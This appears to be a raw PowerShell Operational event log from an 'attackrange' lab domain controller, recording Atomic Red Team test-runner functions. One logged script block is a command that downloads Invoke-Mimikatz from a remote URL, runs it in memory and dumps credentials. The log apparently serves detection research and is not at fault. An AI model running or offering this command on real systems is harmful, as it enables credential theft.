Message=Completed invocation of ScriptBlock ID: 158ce016-e06d-44dc-acd5-bebbf7a83bda
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469741
Keywords=None
Message=Started invocation of ScriptBlock ID: 158ce016-e06d-44dc-acd5-bebbf7a83bda
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469740
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 158ce016-e06d-44dc-acd5-bebbf7a83bda
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469739
Keywords=None
Message=Completed invocation of ScriptBlock ID: da7d39b0-d385-4bff-a356-eb9c8b97a4b8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469738
Keywords=None
Message=Completed invocation of ScriptBlock ID: e03537f6-8c2a-4a6c-b471-1f53dc1dd100
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469737
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0b5c9e33-1038-41d1-82dc-7eef3fbb54a8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469736
Keywords=None
Message=Started invocation of ScriptBlock ID: 0b5c9e33-1038-41d1-82dc-7eef3fbb54a8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469735
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 0b5c9e33-1038-41d1-82dc-7eef3fbb54a8
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469734
Keywords=None
Message=Started invocation of ScriptBlock ID: e03537f6-8c2a-4a6c-b471-1f53dc1dd100
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469733
Keywords=None
Message=Started invocation of ScriptBlock ID: da7d39b0-d385-4bff-a356-eb9c8b97a4b8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469732
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: da7d39b0-d385-4bff-a356-eb9c8b97a4b8
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469731
Keywords=None
Message=Started invocation of ScriptBlock ID: e8f78de0-4a62-4768-bfa0-d547a45537ef
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469730
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5424a9f7-d369-498b-991e-c0804bb922a7
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469729
Keywords=None
Message=Started invocation of ScriptBlock ID: 5424a9f7-d369-498b-991e-c0804bb922a7
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469728
Keywords=None
Message=Completed invocation of ScriptBlock ID: 45903e87-18fc-48ab-86bf-c3b134fe4431
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469727
Keywords=None
Message=Started invocation of ScriptBlock ID: 45903e87-18fc-48ab-86bf-c3b134fe4431
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469726
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5b8c1a59-f6e5-484f-8c58-f8da68569fbd
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469725
Keywords=None
Message=Started invocation of ScriptBlock ID: 5b8c1a59-f6e5-484f-8c58-f8da68569fbd
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469724
Keywords=None
Message=Started invocation of ScriptBlock ID: 35dcc549-8a73-4462-bb66-e64903dfd45e
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469723
Keywords=None
Message=Creating Scriptblock text (1 of 1):
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

ScriptBlock ID: 35dcc549-8a73-4462-bb66-e64903dfd45e
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1469722
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1469721
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5420 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1469720
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469719
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469718
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-ExecuteCommand ($finalCommand, $executor, $TimeoutSeconds, $session = $null, $interactive) {
    $null = @(
        if ($null -eq $finalCommand) { return 0 }
        $finalCommand = $finalCommand.trim()
        Write-Verbose -Message 'Invoking Atomic Tests using defined executor'
        if ($executor -eq "command_prompt" -or $executor -eq "sh" -or $executor -eq "bash") {
            $execPrefix = "-c"
            $execExe = $executor
            if ($executor -eq "command_prompt") { 
                    $execPrefix = "/c"; 
                    $execExe = "cmd.exe"; 
                    $execCommand = $finalCommand -replace "`n", " & " 
            }
            else {
                    $finalCommand = $finalCommand -replace "[\\`"]", "`\$&"
                    $execCommand = $finalCommand -replace "(?<!;)\n", "; "
            }
            $arguments = "$execPrefix `"$execCommand`""
        }
        elseif ($executor -eq "powershell") {
            $execCommand = $finalCommand -replace "`"", "`\`"`""
            if ($session) {
                if ($targetPlatform -eq "windows") {
                        $execExe = "powershell.exe"
                }
                else {
                        $execExe = "pwsh"
                }
            }
            else {
                $execExe = "powershell.exe"; if ($IsLinux -or $IsMacOS) { $execExe = "pwsh" }
            }
            $arguments = "& {$execCommand}"
        }
        else {
            Write-Warning -Message "Unable to generate or execute the command line properly. Unknown executor"
            $res = -1
            return $res
        }
        if ($session) {
            $scriptParentPath = Split-Path $import -Parent
            $fp = Join-Path $scriptParentPath "Invoke-Process.ps1"
            $fp2 = Join-Path $scriptParentPath "Invoke-KillProcessTree.ps1"
            invoke-command -Session $session -FilePath $fp
            invoke-command -Session $session -FilePath $fp2
            $res = invoke-command -Session $session -ScriptBlock { Invoke-Process -filename $Using:execExe -Arguments $Using:arguments -TimeoutSeconds $Using:TimeoutSeconds -stdoutFile "art-out.txt" -stderrFile "art-err.txt"  }
        }
        else {
            if ($interactive) {
                # This use case is: Local execution of tests that contain interactive prompts
                #   In this situation, let the stdout/stderr flow to the console
                $res = Invoke-Process -filename $execExe -Arguments $arguments -TimeoutSeconds $TimeoutSeconds
            }
            else {
                # Local execution that DO NOT contain interactive prompts
                #   In this situation, capture the stdout/stderr for Invoke-AtomicTest to send to the caller
                $res = Invoke-Process -filename $execExe -Arguments $arguments -TimeoutSeconds $TimeoutSeconds -stdoutFile "art-out.txt" -stderrFile "art-err.txt" 
            }
        }
    )
    $res
}

ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-ExecuteCommand.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469717
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469716
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469715
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469714
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Get-InputArgs([hashtable]$ip, $customInputArgs, $PathToAtomicsFolder) {
    $defaultArgs = @{ }
    foreach ($key in $ip.Keys) {
        $defaultArgs[$key] = $ip[$key].default
    }
    # overwrite defaults with any user supplied values
    foreach ($key in $customInputArgs.Keys) {
        if ($defaultArgs.Keys -contains $key) {
            # replace default with user supplied
            $defaultArgs.set_Item($key, $customInputArgs[$key])
        }
    }
    $defaultArgs
}

ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Replace-InputArgs.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469713
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469712
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Merge-InputArgs($finalCommand, $test, $customInputArgs, $PathToAtomicsFolder) {
    if (($null -ne $finalCommand) -and ($test.input_arguments.Count -gt 0)) {
        Write-Verbose -Message 'Replacing inputArgs with user specified values, or default values if none provided'
        $inputArgs = Get-InputArgs $test.input_arguments $customInputArgs $PathToAtomicsFolder

        foreach ($key in $inputArgs.Keys) {
            $findValue = '#{' + $key + '}'
            $finalCommand = $finalCommand.Replace($findValue, $inputArgs[$key])
        }
    }

    # Replace $PathToAtomicsFolder or PathToAtomicsFolder with the actual -PathToAtomicsFolder value
    $finalCommand = ($finalCommand -replace "\`$PathToAtomicsFolder", $PathToAtomicsFolder) -replace "PathToAtomicsFolder", $PathToAtomicsFolder

    $finalCommand
}

ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Replace-InputArgs.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469711
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469710
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469709
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Write-KeyValue ($key, $value) {
    Write-Host -ForegroundColor  Cyan -NoNewline $key
    $split = $value -split "(#{[a-z-_A-Z]*})"
    foreach ($s in $split){
        if($s -match "(#{[a-z-_A-Z]*})"){
            Write-Host -ForegroundColor Red -NoNewline $s
        }
        else {
            Write-Host -ForegroundColor Green -NoNewline $s
        }
    }
    Write-Host ""
}

ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Write-KeyValue.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469708
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469707
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469706
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469705
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469704
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469703
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469702
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469701
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469700
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469699
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469698
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469697
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469696
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469695
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
